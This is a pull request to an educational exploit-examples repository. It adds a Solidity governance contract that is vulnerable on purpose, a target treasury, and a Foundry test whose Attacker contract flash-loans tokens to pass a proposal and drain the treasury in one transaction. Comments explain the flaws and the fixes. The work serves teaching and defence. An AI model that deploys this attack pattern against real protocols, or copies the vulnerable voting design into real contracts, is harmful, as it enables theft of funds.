### PR TITLE
feat: add governance attack example with flash loan PoC

### DIFF
--- a/README.md
+++ b/README.md
@@ -274,7 +274,7 @@ A set of examples where you can see the attack in remix or practice it in a game
         <tr>
             <td>Governance Attack</td>
             <td>
-            Coming Soon...
+            <a href="https://remix.ethereum.org/#url=https://github.com/Cyfrin/sc-exploits-minimized/blob/main/src/governance-attack/Governance.sol&lang=en&optimize=false&runs=200&evmVersion=null&version=soljson-v0.8.20+commit.a1b79de6.js" target="_blank" style="display: inline-block; padding: 10px 15px; font-size: 16px; cursor: pointer; text-align: center; text-decoration: none; outline: none; color: #fff; background-color: #4CAF50; border: none; border-radius: 15px; box-shadow: 0 5px #999;" target="_blank">Remix</a>
             </td>
             <td>
             None

--- a/src/governance-attack/Governance.sol
+++ b/src/governance-attack/Governance.sol
@@ -1,0 +1,79 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+
+/*
+ * @notice A minimal, vulnerable on-chain governance contract.
+ * @notice Voting power is read from the LIVE token balance at vote time, instead
+ *         of a historical snapshot/checkpoint. Because of this, anyone who can
+ *         momentarily hold a large amount of the governance token (for example by
+ *         taking a flash loan) can single-handedly pass and execute any proposal.
+ */
+contract Governance {
+    struct Proposal {
+        address target;
+        bytes data;
+        uint256 votesFor;
+        bool executed;
+    }
+
+    IERC20 public immutable i_governanceToken;
+    uint256 public immutable i_quorum;
+    uint256 public s_proposalCount;
+
+    mapping(uint256 proposalId => Proposal) public s_proposals;
+    mapping(uint256 proposalId => mapping(address voter => bool)) public s_hasVoted;
+
+    error Governance__AlreadyVoted();
+    error Governance__AlreadyExecuted();
+    error Governance__QuorumNotReached();
+    error Governance__CallFailed();
+
+    constructor(IERC20 governanceToken, uint256 quorum) {
+        i_governanceToken = governanceToken;
+        i_quorum = quorum;
+    }
+
+    function propose(address target, bytes calldata data) external returns (uint256 proposalId) {
+        proposalId = s_proposalCount++;
+        Proposal storage proposal = s_proposals[proposalId];
+        proposal.target = target;
+        proposal.data = data;
+    }
+
+    // This is vulnerable! The voting weight is the caller's CURRENT token balance.
+    // There is no snapshot, so flash-loaned tokens are counted as votes.
+    function vote(uint256 proposalId) external {
+        if (s_hasVoted[proposalId][msg.sender]) {
+            revert Governance__AlreadyVoted();
+        }
+        s_hasVoted[proposalId][msg.sender] = true;
+        s_proposals[proposalId].votesFor += i_governanceToken.balanceOf(msg.sender);
+    }
+
+    // This is vulnerable too! A proposal can be proposed, voted on, and executed in
+    // the same block. There is no voting delay and no timelock, so the entire attack
+    // fits inside a single flash-loan callback.
+    function execute(uint256 proposalId) external {
+        Proposal storage proposal = s_proposals[proposalId];
+        if (proposal.executed) {
+            revert Governance__AlreadyExecuted();
+        }
+        if (proposal.votesFor < i_quorum) {
+            revert Governance__QuorumNotReached();
+        }
+        proposal.executed = true;
+        (bool success,) = proposal.target.call(proposal.data);
+        if (!success) {
+            revert Governance__CallFailed();
+        }
+    }
+
+    // Prevention:
+    // - Snapshot voting power at proposal creation and read it with a historical
+    //   lookup (e.g. OpenZeppelin's ERC20Votes + getPastVotes). Tokens acquired
+    //   after the snapshot then carry no weight, which neutralizes flash loans.
+    // - Add a voting delay between when a proposal is created and when voting opens.
+    // - Add a timelock between a successful vote and execution.
+}

--- a/src/governance-attack/Treasury.sol
+++ b/src/governance-attack/Treasury.sol
@@ -1,0 +1,30 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+/*
+ * @notice A minimal protocol treasury whose funds can only be moved by governance.
+ * @notice It is the target of the governance attack: once an attacker controls a
+ *         passing proposal, they make governance call `withdraw` to drain the ETH.
+ */
+contract Treasury {
+    address public immutable i_governance;
+
+    error Treasury__NotGovernance();
+    error Treasury__TransferFailed();
+
+    constructor(address governance) {
+        i_governance = governance;
+    }
+
+    function withdraw(address to) external {
+        if (msg.sender != i_governance) {
+            revert Treasury__NotGovernance();
+        }
+        (bool success,) = to.call{value: address(this).balance}("");
+        if (!success) {
+            revert Treasury__TransferFailed();
+        }
+    }
+
+    receive() external payable {}
+}

--- a/test/unit/GovernanceAttackTest.t.sol
+++ b/test/unit/GovernanceAttackTest.t.sol
@@ -1,0 +1,110 @@
+// SPDX-License-Identifier: MIT
+pragma solidity 0.8.20;
+
+import {Test, console2} from "forge-std/Test.sol";
+import {ERC20} from "@openzeppelin/contracts/token/ERC20/ERC20.sol";
+import {IERC20} from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
+import {Governance} from "../../src/governance-attack/Governance.sol";
+import {Treasury} from "../../src/governance-attack/Treasury.sol";
+
+contract GovToken is ERC20 {
+    constructor() ERC20("Gov Token", "GOV") {}
+
+    function mint(address to, uint256 amount) external {
+        _mint(to, amount);
+    }
+}
+
+// A bare-bones flash lender: it hands over its entire balance and only requires
+// that the same amount is paid back by the end of the call.
+contract FlashLender {
+    IERC20 public immutable i_token;
+
+    error FlashLender__NotRepaid();
+
+    constructor(IERC20 token) {
+        i_token = token;
+    }
+
+    function flashLoan(uint256 amount, address borrower) external {
+        uint256 balanceBefore = i_token.balanceOf(address(this));
+        i_token.transfer(borrower, amount);
+        Attacker(payable(borrower)).onFlashLoan(amount);
+        if (i_token.balanceOf(address(this)) < balanceBefore) {
+            revert FlashLender__NotRepaid();
+        }
+    }
+}
+
+// Borrows the governance token, passes a malicious proposal, drains the treasury,
+// and repays the loan -- all atomically inside a single transaction.
+contract Attacker {
+    Governance public immutable i_governance;
+    Treasury public immutable i_treasury;
+    IERC20 public immutable i_token;
+    FlashLender public immutable i_lender;
+
+    constructor(Governance governance, Treasury treasury, IERC20 token, FlashLender lender) {
+        i_governance = governance;
+        i_treasury = treasury;
+        i_token = token;
+        i_lender = lender;
+    }
+
+    function attack(uint256 loanAmount) external {
+        i_lender.flashLoan(loanAmount, address(this));
+    }
+
+    function onFlashLoan(uint256 amount) external {
+        // We now temporarily hold a huge governance balance.
+        uint256 proposalId =
+            i_governance.propose(address(i_treasury), abi.encodeWithSelector(Treasury.withdraw.selector, address(this)));
+        i_governance.vote(proposalId); // counts our flash-loaned balance as votes
+        i_governance.execute(proposalId); // drains the treasury to this contract
+        i_token.transfer(address(i_lender), amount); // repay the loan
+    }
+
+    receive() external payable {}
+}
+
+contract GovernanceAttackTest is Test {
+    GovToken token;
+    Governance governance;
+    Treasury treasury;
+    FlashLender lender;
+    Attacker attacker;
+
+    uint256 constant QUORUM = 1_000_000e18;
+    uint256 constant TREASURY_FUNDS = 50 ether;
+
+    function setUp() public {
+        token = new GovToken();
+        governance = new Governance(IERC20(address(token)), QUORUM);
+        treasury = new Treasury(address(governance));
+        lender = new FlashLender(IERC20(address(token)));
+        attacker = new Attacker(governance, treasury, IERC20(address(token)), lender);
+
+        // The lender holds more than enough tokens to single-handedly reach quorum.
+        token.mint(address(lender), QUORUM);
+
+        // The protocol treasury is funded.
+        vm.deal(address(treasury), TREASURY_FUNDS);
+    }
+
+    function test_governanceAttack() public {
+        assertEq(address(treasury).balance, TREASURY_FUNDS);
+        assertEq(address(attacker).balance, 0);
+        assertEq(token.balanceOf(address(attacker)), 0);
+
+        // Attacker owns no governance tokens of their own, only a flash loan.
+        attacker.attack(QUORUM);
+
+        // The treasury has been fully drained to the attacker...
+        assertEq(address(treasury).balance, 0);
+        assertEq(address(attacker).balance, TREASURY_FUNDS);
+
+        // ...and the flash loan was repaid, so the attacker keeps no tokens.
+        assertEq(token.balanceOf(address(attacker)), 0);
+        assertEq(token.balanceOf(address(lender)), QUORUM);
+    }
+}


### PR DESCRIPTION
## What this adds

Fills the "Governance Attack" gap in the README (currently "Coming Soon...").

### New files
- `src/governance-attack/Governance.sol` — vulnerable governance contract that reads live token balance instead of a historical snapshot for voting power
- `src/governance-attack/Treasury.sol` ETH treasury drainable only via governance (the attack target)
- `test/unit/GovernanceAttackTest.t.sol` Foundry test demonstrating the full flash-loan takeover: borrow tokens → propose → vote → drain treasury → repay loan, all atomically in one tx

### README
- Replaced "Coming Soon..." in the Governance Attack row with a Remix link

## Real-world reference
Tornado Cash governance attack (May 2023) — attacker used a malicious proposal to mint 1.2M TORN tokens and take full control of governance.

## Test output
forge test --match-contract GovernanceAttackTest -vv

Ran 1 test for test/unit/GovernanceAttackTest.t.sol:GovernanceAttackTest
[PASS] test_governanceAttack() (gas: 241145)
Suite result: ok. 1 passed; 0 failed; 0 skipped